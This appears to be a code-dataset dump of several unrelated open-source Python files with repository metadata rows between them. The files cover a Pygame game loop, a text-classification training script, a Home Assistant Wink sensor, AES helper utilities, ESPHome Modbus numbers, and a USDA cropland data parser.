if is_off_screen(ground_group.sprites()[0]):
ground_group.remove(ground_group.sprites()[0])
new_ground = Ground(GROUND_WIDTH - 20)
ground_group.add(new_ground)
if is_off_screen(pipe_group.sprites()[0]):
pipe_group.remove(pipe_group.sprites()[0])
pipe_group.remove(pipe_group.sprites()[0])
pipes = get_random_pipes(SCREEN_WIDTH * 2)
pipe_group.add(pipes[0])
pipe_group.add(pipes[1])
bird_group.update()
ground_group.update()
pipe_group.update()
pipe_group.draw(screen)
ground_group.draw(screen)
bird_group.draw(screen)
pygame.display.update()
if (pygame.sprite.groupcollide(bird_group, ground_group, False, False, pygame.sprite.collide_mask)
or pygame.sprite.groupcollide(bird_group, pipe_group, False, False, pygame.sprite.collide_mask)):
# Game Over
input()
pygame.display.update()
break
| 26.604278 | 102 | 0.637186 | 659 | 4,975 | 4.629742 | 0.200303 | 0.047198 | 0.034415 | 0.048181 | 0.408391 | 0.361193 | 0.300229 | 0.27532 | 0.202229 | 0.145854 | 0 | 0.018037 | 0.242211 | 4,975 | 186 | 103 | 26.747312 | 0.791247 | 0.057487 | 0 | 0.222222 | 0 | 0 | 0.037639 | 0.034431 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.017094 | 0.008547 | 0.136752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379d69c530c32691ab9a0100007cee3fa8cae31c | 2,487 | py | Python | GolVe_Classification/GolVe+lr/train_model.py | majingliang/machine_learning | cd70e3a07bd1f0803ebcffebca565e70aff96de8 | [
"MIT"
] | 1 | 2019-09-29T13:36:29.000Z | 2019-09-29T13:36:29.000Z | GolVe_Classification/GolVe+lr/train_model.py | yummydeli/machine_learning | 54471182ac21ef0eee26557a7bd6f3a3dc3a09bd | [
"MIT"
] | null | null | null | GolVe_Classification/GolVe+lr/train_model.py | yummydeli/machine_learning | 54471182ac21ef0eee26557a7bd6f3a3dc3a09bd | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from sklearn.datasets.base import Bunch
import os
import pickle
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cross_validation import train_test_split
import random
from collections import defaultdict
from sklearn.linear_model import LogisticRegressionCV, LinearRegression
from sklearn.metrics import roc_auc_score
from snownlp import SnowNLP
from sklearn.externals import joblib
import sys
sys.path.append('/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/baseline')
from unit import metric, qieci
if __name__ == '__main__':
# load data
train_comment_path = '/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/new_model/comment_cutwords.csv'
train_comment_data = pd.read_csv(open(train_comment_path, 'rU'), header=0)
print(train_comment_data.head())
with open(
'/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/new_model/model_data/vocab_emb.dat',
'rb') as f:
vocab_emb = pickle.load(f)
emb_train = []
label = []
for i in range(train_comment_data.shape[0]):
line = train_comment_data.after_cut[i]
cnt = 0
try:
seq = line.split(' ')
except:
print('not a common sequence')
print(line)
continue
for word in seq:
try:
if cnt == 0:
emb = np.array(vocab_emb[word])
else:
emb += np.array(vocab_emb[word])
cnt += 1
except:
continue
if cnt == 0:
    # skip sequences where no word had an embedding; otherwise `emb` is
    # undefined and `emb / cnt` divides by zero
    print('no embedding found for sequence')
    print(line)
    continue
if np.isnan(sum(emb / cnt)):
print('not a common length')
print(line)
else:
emb_train.append(emb / cnt)
label.append([train_comment_data.label[i]])
emb_train = np.array(emb_train)
label = np.hstack(label)
lr = LogisticRegressionCV(multi_class="ovr", fit_intercept=True, Cs=np.logspace(-2, 2, 20), cv=2, penalty="l2",
solver="lbfgs", tol=0.01, class_weight={0: 0.1, 1: 0.9})
re = lr.fit(emb_train, label)
f1 = lr.predict_proba(emb_train)[:, 1]
merge_data = pd.DataFrame(np.stack([f1, label], axis=1), columns=['pred', 'actual'])
eval_res = metric(merge_data)
joblib.dump(re,
"/Users/slade/Documents/YMM/Code/UCGPCG/src/jobs/terror_recognition/train_model/new_model/train_model.m")
| 36.573529 | 136 | 0.644552 | 334 | 2,487 | 4.613772 | 0.407186 | 0.05451 | 0.051914 | 0.057106 | 0.215445 | 0.215445 | 0.186892 | 0.186892 | 0.186892 | 0.186892 | 0 | 0.0128 | 0.24608 | 2,487 | 67 | 137 | 37.119403 | 0.809067 | 0.003619 | 0 | 0.166667 | 0 | 0.066667 | 0.195477 | 0.165994 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379d9ac43e5f8a9e61641e45c339fb8f78a1a4d0 | 3,136 | py | Python | homeassistant/components/sensor/wink.py | TastyPi/home-assistant | aa1e4c564cb8660bf6b7637bc25317ee58869214 | [
"MIT"
] | 13 | 2017-02-01T13:25:34.000Z | 2022-01-26T01:30:39.000Z | homeassistant/components/sensor/wink.py | 1Forward1Back/home-assistant | ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6 | [
"MIT"
] | 9 | 2017-07-26T18:05:32.000Z | 2021-12-05T14:16:34.000Z | homeassistant/components/sensor/wink.py | 1Forward1Back/home-assistant | ce24ef0c20dea0fd671d6f2c2a8b1456b4b66ba6 | [
"MIT"
] | 21 | 2017-07-26T17:09:40.000Z | 2022-03-27T22:37:22.000Z | """
Support for Wink sensors.
For more details about this platform, please refer to the documentation at
at https://home-assistant.io/components/sensor.wink/
"""
import logging
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
from homeassistant.components.wink import WinkDevice
from homeassistant.loader import get_component
DEPENDENCIES = ['wink']
SENSOR_TYPES = ['temperature', 'humidity', 'balance', 'proximity']
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Wink platform."""
import pywink
for sensor in pywink.get_sensors():
if sensor.capability() in SENSOR_TYPES:
add_devices([WinkSensorDevice(sensor, hass)])
for eggtray in pywink.get_eggtrays():
add_devices([WinkEggMinder(eggtray, hass)])
for piggy_bank in pywink.get_piggy_banks():
try:
if piggy_bank.capability() in SENSOR_TYPES:
add_devices([WinkSensorDevice(piggy_bank, hass)])
except AttributeError:
logging.getLogger(__name__).info("Device is not a sensor")
class WinkSensorDevice(WinkDevice, Entity):
"""Representation of a Wink sensor."""
def __init__(self, wink, hass):
"""Initialize the Wink device."""
super().__init__(wink, hass)
wink = get_component('wink')
self.capability = self.wink.capability()
if self.wink.UNIT == '°':
self._unit_of_measurement = TEMP_CELSIUS
else:
self._unit_of_measurement = self.wink.UNIT
@property
def state(self):
"""Return the state."""
state = None
if self.capability == 'humidity':
if self.wink.humidity_percentage() is not None:
state = round(self.wink.humidity_percentage())
elif self.capability == 'temperature':
if self.wink.temperature_float() is not None:
state = round(self.wink.temperature_float(), 1)
elif self.capability == 'balance':
if self.wink.balance() is not None:
state = round(self.wink.balance() / 100, 2)
elif self.capability == 'proximity':
if self.wink.proximity_float() is not None:
state = self.wink.proximity_float()
else:
# A sensor should never get here, anything that does
# will require an update to python-wink
logging.getLogger(__name__).error("Please report this as an issue")
state = None
return state
@property
def available(self):
"""True if connection == True."""
return self.wink.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
class WinkEggMinder(WinkDevice, Entity):
"""Representation of a Wink Egg Minder."""
def __init__(self, wink, hass):
"""Initialize the sensor."""
WinkDevice.__init__(self, wink, hass)
@property
def state(self):
"""Return the state."""
return self.wink.state()
| 32.666667 | 79 | 0.638712 | 365 | 3,136 | 5.323288 | 0.309589 | 0.065878 | 0.025733 | 0.028821 | 0.210499 | 0.198147 | 0.160062 | 0 | 0 | 0 | 0 | 0.002141 | 0.255421 | 3,136 | 95 | 80 | 33.010526 | 0.82955 | 0.162628 | 0 | 0.2 | 0 | 0 | 0.050933 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116667 | false | 0 | 0.1 | 0 | 0.316667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
379e0ba70961375d128909802ed03cfc631262e2 | 2,925 | py | Python | src/backend/opsbot/stdlib.py | xiashuqin89/bk-chatbot | d3f95363032f699cbc7e6617060642e0763443a6 | [
"MIT"
] | null | null | null | src/backend/opsbot/stdlib.py | xiashuqin89/bk-chatbot | d3f95363032f699cbc7e6617060642e0763443a6 | [
"MIT"
] | null | null | null | src/backend/opsbot/stdlib.py | xiashuqin89/bk-chatbot | d3f95363032f699cbc7e6617060642e0763443a6 | [
"MIT"
] | null | null | null | """
TencentBlueKing is pleased to support the open source community by making
蓝鲸智云PaaS平台社区版 (BlueKing PaaSCommunity Edition) available.
Copyright (C) 2017-2018 THL A29 Limited,
a Tencent company. All rights reserved.
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import random
import hashlib
from base64 import urlsafe_b64encode, urlsafe_b64decode
from Crypto.Cipher import AES
def escape(s: str, *, escape_comma: bool = True) -> str:
s = s.replace('&', '&') \
.replace('[', '[') \
.replace(']', ']')
if escape_comma:
s = s.replace(',', ',')
return s
def unescape(s: str) -> str:
return s.replace(',', ',') \
.replace('[', '[') \
.replace(']', ']') \
.replace('&', '&')
def pad(text, blocksize=16):
"""
PKCS#5 Padding
"""
pad = blocksize - (len(text) % blocksize)
return text + pad * chr(pad)
def unpad(text):
"""
PKCS#5 Padding
"""
pad = ord(text[-1])
return text[:-pad]
def salt(length=8):
"""
Generate a random string of the given length.
"""
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
return ''.join([random.choice(alphabet) for _ in range(length)])
class Aes(object):
def __init__(self, app_id='', app_key=''):
self.key = hashlib.md5(f"{app_id}{app_key}".encode("utf-8")).hexdigest()
def decrypt_dict(self, ciphertext, base64=True):
return json.loads(self.decrypt(ciphertext, base64))
def encrypt_dict(self, value, base64=True):
return self.encrypt(json.dumps(value), base64)
def decrypt(self, ciphertext, base64=True):
"""
AES Decrypt
"""
if base64:
ciphertext = urlsafe_b64decode(str(ciphertext + '=' * (4 - len(ciphertext) % 4)))
data = ciphertext
key = self.key.encode('utf-8')
key = hashlib.md5(key).digest()
cipher = AES.new(key, AES.MODE_ECB)
return unpad(cipher.decrypt(data).decode())
def encrypt(self, plaintext, base64=True):
"""
AES Encrypt
"""
key = self.key.encode('utf-8')
key = hashlib.md5(key).digest()
cipher = AES.new(key, AES.MODE_ECB)
plaintext = pad(plaintext).encode('utf-8')
ciphertext = cipher.encrypt(plaintext)
# base64-encode the ciphertext
if base64:
ciphertext = urlsafe_b64encode(ciphertext).decode().rstrip('=')
return ciphertext
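def _example_aes_roundtrip():
    """Hedged sketch, not part of the original module: a dict round-trips
    through encrypt_dict/decrypt_dict; the app credentials are made up."""
    aes = Aes(app_id='demo_app', app_key='demo_key')
    token = aes.encrypt_dict({'user': 'alice'})
    return aes.decrypt_dict(token)  # -> {'user': 'alice'}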
| 28.676471 | 93 | 0.631111 | 359 | 2,925 | 5.089136 | 0.440111 | 0.032841 | 0.021894 | 0.021346 | 0.073344 | 0.073344 | 0.073344 | 0.073344 | 0.073344 | 0.073344 | 0 | 0.033363 | 0.231453 | 2,925 | 101 | 94 | 28.960396 | 0.779359 | 0.270769 | 0 | 0.16 | 0 | 0 | 0.073255 | 0.030482 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.06 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37a06a46bd7dbc7b3904bddfec3b2e850b11c9b4 | 518 | py | Python | tests/endpoints/test_pricing.py | tacchang001/oandapyV20helper | c8bff56ce9b3d69207911c899652df4328a8a847 | [
"MIT"
] | null | null | null | tests/endpoints/test_pricing.py | tacchang001/oandapyV20helper | c8bff56ce9b3d69207911c899652df4328a8a847 | [
"MIT"
] | null | null | null | tests/endpoints/test_pricing.py | tacchang001/oandapyV20helper | c8bff56ce9b3d69207911c899652df4328a8a847 | [
"MIT"
] | null | null | null | import json
import pytest
from oandaV20helper.endpoints.pricing import to_dom
class TestPricing:
@pytest.mark.parametrize("num, filename", [
(1, 'test_pricing01.json'),
(3, 'test_pricing02.json'),
(15, 'test_pricing03.json')
])
def test_to_dataframe(self, num, filename):
with open(filename, 'r') as f:
raw_dict = json.load(f)
result = to_dom(raw_dict)
print(result)
# if __name__ == '__main__':
# pytest.main(['-v', __file__])
| 22.521739 | 51 | 0.606178 | 62 | 518 | 4.725806 | 0.645161 | 0.03413 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.258687 | 518 | 22 | 52 | 23.545455 | 0.731771 | 0.11583 | 0 | 0 | 0 | 0 | 0.156044 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.214286 | 0 | 0.357143 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37a25acc37f7d6522679e3d2bfe44a22a8595cc0 | 2,364 | py | Python | tests/__init__.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | tests/__init__.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | tests/__init__.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | import logging
from pathlib import Path
from utsc.core import Util
class PropogateHandler(logging.Handler):
def emit(self, record):
logging.getLogger(record.name).handle(record)
class MockFolders:
class ConfDir:
def __init__(self, path: Path, app_name: str) -> None:
self.dir = path
self.ini_file = path.joinpath(f"{app_name}.ini")
self.json_file = path.joinpath(f"{app_name}.json")
self.yaml_file = path.joinpath(f"{app_name}.yaml")
self.toml_file = path.joinpath(f"{app_name}.toml")
def __init__(self, tmp_path: Path, app_name: str) -> None:
self.root = tmp_path
self.site_config = MockFolders.ConfDir(
tmp_path / "etc/xdg/utsc-tools", app_name
)
# This would be:
# - /Library/Application Support/utsc-tools on MacOS,
# - /etc/xdg/utsc-tools on Linux,
# - C:\ProgramData\utsc-tools on Win 7+
# an alternative site config path, used to test the *_SITE_CONFIG env var logic
self.site_config_env = MockFolders.ConfDir(tmp_path / "etc/alternate", app_name)
self.user_config = MockFolders.ConfDir(
tmp_path / "home/user/.config/utsc-tools", app_name
)
# This would be:
# - ~/Library/Application Support/utsc-tools on MacOS,
# - ~/.config/utsc-tools on Linux,
# - C:\Users\<username>\AppData\Local\utsc-tools on Win 7+
# an alternative user config path, used to test the *_USER_CONFIG env var logic
self.user_config_env = MockFolders.ConfDir(
tmp_path / "home/alternate", app_name
)
self.site_cache = tmp_path / f"usr/local/share/utsc-tools/{app_name}"
self.user_cache = tmp_path / f"home/user/.local/share/utsc-tools/{app_name}"
self.site_cache_env = tmp_path / "usr/local/share/utsc-tools/alternate"
self.user_cache_env = tmp_path / "home/user/.local/share/utsc-tools/alternate"
# create the folders
self.site_config.dir.mkdir(parents=True)
self.site_config_env.dir.mkdir(parents=True)
self.user_config.dir.mkdir(parents=True)
self.user_config_env.dir.mkdir(parents=True)
self.site_cache.mkdir(parents=True)
self.user_cache.mkdir(parents=True)
class MockedUtil(Util):
mock_folders: MockFolders
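# Hedged sketch (not part of the original file): in a test module these
# helpers are typically wired together through a pytest fixture, roughly:
#
#   @pytest.fixture
#   def mock_folders(tmp_path):
#       return MockFolders(tmp_path, "example-app")
#
# How MockedUtil binds its `mock_folders` attribute depends on Util's
# constructor, which is not shown here, so that wiring is left out.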
| 38.129032 | 88 | 0.648054 | 321 | 2,364 | 4.588785 | 0.242991 | 0.057026 | 0.044807 | 0.067889 | 0.634759 | 0.466395 | 0.274949 | 0.092329 | 0.092329 | 0.092329 | 0 | 0.001109 | 0.236887 | 2,364 | 61 | 89 | 38.754098 | 0.81541 | 0.198393 | 0 | 0 | 0 | 0 | 0.155072 | 0.099841 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0.078947 | 0 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37a39ff3342130319876ca4904644fe3206688ea | 3,889 | py | Python | esphome/components/modbus_controller/number/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/modbus_controller/number/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/modbus_controller/number/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import number
from esphome.const import (
CONF_ADDRESS,
CONF_ID,
CONF_MAX_VALUE,
CONF_MIN_VALUE,
CONF_MULTIPLY,
CONF_STEP,
)
from .. import (
MODBUS_WRITE_REGISTER_TYPE,
add_modbus_base_properties,
modbus_controller_ns,
modbus_calc_properties,
ModbusItemBaseSchema,
SensorItem,
SENSOR_VALUE_TYPE,
)
from ..const import (
CONF_BITMASK,
CONF_CUSTOM_COMMAND,
CONF_FORCE_NEW_RANGE,
CONF_MODBUS_CONTROLLER_ID,
CONF_REGISTER_TYPE,
CONF_SKIP_UPDATES,
CONF_USE_WRITE_MULTIPLE,
CONF_VALUE_TYPE,
CONF_WRITE_LAMBDA,
)
DEPENDENCIES = ["modbus_controller"]
CODEOWNERS = ["@martgras"]
ModbusNumber = modbus_controller_ns.class_(
"ModbusNumber", cg.Component, number.Number, SensorItem
)
def validate_min_max(config):
if config[CONF_MAX_VALUE] <= config[CONF_MIN_VALUE]:
raise cv.Invalid("max_value must be greater than min_value")
if config[CONF_MIN_VALUE] < -16777215:
raise cv.Invalid("max_value must be greater than -16777215")
if config[CONF_MAX_VALUE] > 16777215:
raise cv.Invalid("max_value must not be greater than 16777215")
return config
def validate_modbus_number(config):
if CONF_CUSTOM_COMMAND not in config and CONF_ADDRESS not in config:
raise cv.Invalid(
f" {CONF_ADDRESS} is a required property if '{CONF_CUSTOM_COMMAND}:' isn't used"
)
return config
CONFIG_SCHEMA = cv.All(
number.NUMBER_SCHEMA.extend(ModbusItemBaseSchema).extend(
{
cv.GenerateID(): cv.declare_id(ModbusNumber),
cv.Optional(CONF_REGISTER_TYPE, default="holding"): cv.enum(
MODBUS_WRITE_REGISTER_TYPE
),
cv.Optional(CONF_VALUE_TYPE, default="U_WORD"): cv.enum(SENSOR_VALUE_TYPE),
cv.Optional(CONF_WRITE_LAMBDA): cv.returning_lambda,
# 24 bits are the maximum value for fp32 before precision is lost
# 0x00FFFFFF = 16777215
cv.Optional(CONF_MAX_VALUE, default=16777215.0): cv.float_,
cv.Optional(CONF_MIN_VALUE, default=-16777215.0): cv.float_,
cv.Optional(CONF_STEP, default=1): cv.positive_float,
cv.Optional(CONF_MULTIPLY, default=1.0): cv.float_,
cv.Optional(CONF_USE_WRITE_MULTIPLE, default=False): cv.boolean,
}
),
validate_min_max,
validate_modbus_number,
)
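# Hedged illustration (not part of the original file): a YAML block this
# schema would accept; every value below is a made-up example.
#
# number:
#   - platform: modbus_controller
#     modbus_controller_id: modbus1
#     name: "Target Temperature"
#     address: 0x0100
#     value_type: U_WORD
#     min_value: 0
#     max_value: 100
#     step: 1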
async def to_code(config):
byte_offset, reg_count = modbus_calc_properties(config)
var = cg.new_Pvariable(
config[CONF_ID],
config[CONF_REGISTER_TYPE],
config[CONF_ADDRESS],
byte_offset,
config[CONF_BITMASK],
config[CONF_VALUE_TYPE],
reg_count,
config[CONF_SKIP_UPDATES],
config[CONF_FORCE_NEW_RANGE],
)
await cg.register_component(var, config)
await number.register_number(
var,
config,
min_value=config[CONF_MIN_VALUE],
max_value=config[CONF_MAX_VALUE],
step=config[CONF_STEP],
)
cg.add(var.set_write_multiply(config[CONF_MULTIPLY]))
parent = await cg.get_variable(config[CONF_MODBUS_CONTROLLER_ID])
cg.add(var.set_parent(parent))
cg.add(parent.add_sensor_item(var))
await add_modbus_base_properties(var, config, ModbusNumber)
cg.add(var.set_use_write_mutiple(config[CONF_USE_WRITE_MULTIPLE]))
if CONF_WRITE_LAMBDA in config:
template_ = await cg.process_lambda(
config[CONF_WRITE_LAMBDA],
[
(ModbusNumber.operator("ptr"), "item"),
(cg.float_, "x"),
(cg.std_vector.template(cg.uint16).operator("ref"), "payload"),
],
return_type=cg.optional.template(float),
)
cg.add(var.set_write_template(template_))
| 30.865079 | 92 | 0.674466 | 489 | 3,889 | 5.03681 | 0.259714 | 0.073082 | 0.045473 | 0.030857 | 0.139667 | 0.095818 | 0.086886 | 0.086886 | 0.065773 | 0 | 0 | 0.023458 | 0.232708 | 3,889 | 125 | 93 | 31.112 | 0.801944 | 0.021599 | 0 | 0.037383 | 0 | 0 | 0.070752 | 0.006312 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018692 | false | 0 | 0.056075 | 0 | 0.093458 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37ad7164ae63d5ffb588e864b6d5d0bdac217918 | 9,305 | py | Python | flowsa/USDA_CoA_Cropland.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | flowsa/USDA_CoA_Cropland.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | flowsa/USDA_CoA_Cropland.py | cchiq/flowsa | fc21e8da7c3ba66ca4ae4a0c72f568af7ef5e6c0 | [
"CC0-1.0"
] | null | null | null | # USDA_CoA_Cropland.py (flowsa)
# !/usr/bin/env python3
# coding=utf-8
import json
import numpy as np
import pandas as pd
from flowsa.common import *
def CoA_Cropland_URL_helper(build_url, config, args):
"""This helper function uses the "build_url" input from flowbyactivity.py, which is a base url for coa cropland data
that requires parts of the url text string to be replaced with info specific to the usda nass quickstats API.
This function does not parse the data, only modifies the urls from which data is obtained. """
# initiate url list for coa cropland data
urls = []
# call on state acronyms from common.py (and remove entry for DC)
state_abbrevs = abbrev_us_state
state_abbrevs = {k: v for (k, v) in state_abbrevs.items() if k != "DC"}
# replace "__aggLevel__" in build_url to create three urls
for x in config['agg_levels']:
for y in config['sector_levels']:
# at national level, remove the text string calling for state acronyms
if x == 'NATIONAL':
url = build_url
url = url.replace("__aggLevel__", x)
url = url.replace("__secLevel__", y)
url = url.replace("&state_alpha=__stateAlpha__", "")
if y == "ECONOMICS":
url = url.replace(
"AREA HARVESTED&statisticcat_desc=AREA IN PRODUCTION&statisticcat_desc=TOTAL&statisticcat_desc=AREA BEARING %26 NON-BEARING",
"AREA")
else:
url = url.replace("&commmodity_desc=AG LAND", "")
url = url.replace(" ", "%20")
urls.append(url)
else:
# substitute in state acronyms for state and county url calls
for z in state_abbrevs:
url = build_url
url = url.replace("__aggLevel__", x)
url = url.replace("__secLevel__", y)
url = url.replace("__stateAlpha__", z)
if y == "ECONOMICS":
url = url.replace(
"AREA HARVESTED&statisticcat_desc=AREA IN PRODUCTION&statisticcat_desc=TOTAL&statisticcat_desc=AREA BEARING %26 NON-BEARING",
"AREA")
else:
url = url.replace("&commmodity_desc=AG LAND", "")
url = url.replace(" ", "%20")
urls.append(url)
return urls
def coa_cropland_call(url, coa_response, args):
cropland_json = json.loads(coa_response.text)
df_cropland = pd.DataFrame(data=cropland_json["data"])
return df_cropland
def coa_cropland_parse(dataframe_list, args):
"""Modify the imported data so it meets the flowbyactivity criteria and only includes data on harvested acreage
(irrigated and total). Data is split into two parquets, one for acreage and the other for operations"""
df = pd.concat(dataframe_list, sort=True)
# specify desired data based on domain_desc
df = df[df['domain_desc'].isin(['AREA HARVESTED', 'AREA IN PRODUCTION', 'TOTAL', 'AREA BEARING & NON-BEARING', 'AREA'])]
# Many crops are listed as their own commodities as well as grouped within a broader category (for example, orange
# trees are also part of orchards). As this data is not needed, takes up space, and can lead to double counting if
# included, we want to drop these duplicated rows
# subset dataframe into the 5 crop types and drop rows
# crop totals: drop all data
# field crops: don't want certain commodities and don't want detailed types of wheat, cotton, or sunflower
df_fc = df[df['group_desc'] == 'FIELD CROPS']
df_fc = df_fc[~df_fc['commodity_desc'].isin(['GRASSES', 'GRASSES & LEGUMES, OTHER', 'LEGUMES', 'HAY', 'HAYLAGE'])]
df_fc = df_fc[~df_fc['class_desc'].str.contains('SPRING|WINTER|TRADITIONAL|OIL|PIMA|UPLAND', regex=True)]
# fruit and tree nuts: only want a few commodities
df_ftn = df[df['group_desc'] == 'FRUIT & TREE NUTS']
df_ftn = df_ftn[df_ftn['commodity_desc'].isin(['BERRY TOTALS', 'ORCHARDS'])]
df_ftn = df_ftn[df_ftn['class_desc'].isin(['ALL CLASSES'])]
# horticulture: only want a few commodities
df_h = df[df['group_desc'] == 'HORTICULTURE']
df_h = df_h[df_h['commodity_desc'].isin(['CUT CHRISTMAS TREES', 'SHORT TERM WOODY CROPS'])]
# vegetables: only want a few commodities
df_v = df[df['group_desc'] == 'VEGETABLES']
df_v = df_v[df_v['commodity_desc'].isin(['VEGETABLE TOTALS'])]
# only want ag land in farms & land & assets
df_fla = df[df['group_desc'] == 'FARMS & LAND & ASSETS']
df_fla = df_fla[df_fla['short_desc'].str.contains("AG LAND")]
# concat data frames
df = pd.concat([df_fc, df_ftn, df_h, df_v, df_fla])
# drop unused columns
df = df.drop(columns=['agg_level_desc', 'domain_desc', 'location_desc', 'state_alpha', 'sector_desc',
'country_code', 'begin_code', 'watershed_code', 'reference_period_desc',
'asd_desc', 'county_name', 'source_desc', 'congr_district_code', 'asd_code',
'week_ending', 'freq_desc', 'load_time', 'zip_5', 'watershed_desc', 'region_desc',
'state_ansi', 'state_name', 'country_name', 'county_ansi', 'end_code', 'group_desc'])
# create FIPS column by combining existing columns
df.loc[df['county_code'] == '', 'county_code'] = '000' # add county fips when missing
df['Location'] = df['state_fips_code'] + df['county_code']
df.loc[df['Location'] == '99000', 'Location'] = US_FIPS # modify national level fips
# use info from other columns to determine flow name
df['FlowName'] = np.where(df["unit_desc"] == 'OPERATIONS', df["unit_desc"], df['statisticcat_desc'])
# combine column information to create activity information, and create two new columns for activities
df['Activity'] = df['commodity_desc'] + ', ' + df['class_desc'] + ', ' + df['util_practice_desc'] # drop this column later
df['Activity'] = df['Activity'].str.replace(", ALL CLASSES", "", regex=True) # not interested in all data from class_desc
df['Activity'] = df['Activity'].str.replace(", ALL UTILIZATION PRACTICES", "", regex=True) # not interested in all data from class_desc
df['ActivityProducedBy'] = np.where(df["unit_desc"] == 'OPERATIONS', df["Activity"], 'None')
df['ActivityConsumedBy'] = np.where(df["unit_desc"] == 'ACRES', df["Activity"], 'None')
# add compartment based on values from other columns
df['Compartment'] = df['prodn_practice_desc'] + ', ' + df['domaincat_desc']
df['Compartment'] = df['Compartment'].str.replace("ALL PRODUCTION PRACTICES, ", "", regex=True)
df['Compartment'] = df['Compartment'].str.replace("IN THE OPEN, ", "", regex=True)
# rename columns to match flowbyactivity format
df = df.rename(columns={"Value": "FlowAmount", "unit_desc": "Unit",
"year": "Year", "CV (%)": "Spread",
"short_desc": "Description"})
# drop remaining unused columns
df = df.drop(columns=['Activity', 'class_desc', 'commodity_desc', 'state_fips_code', 'county_code',
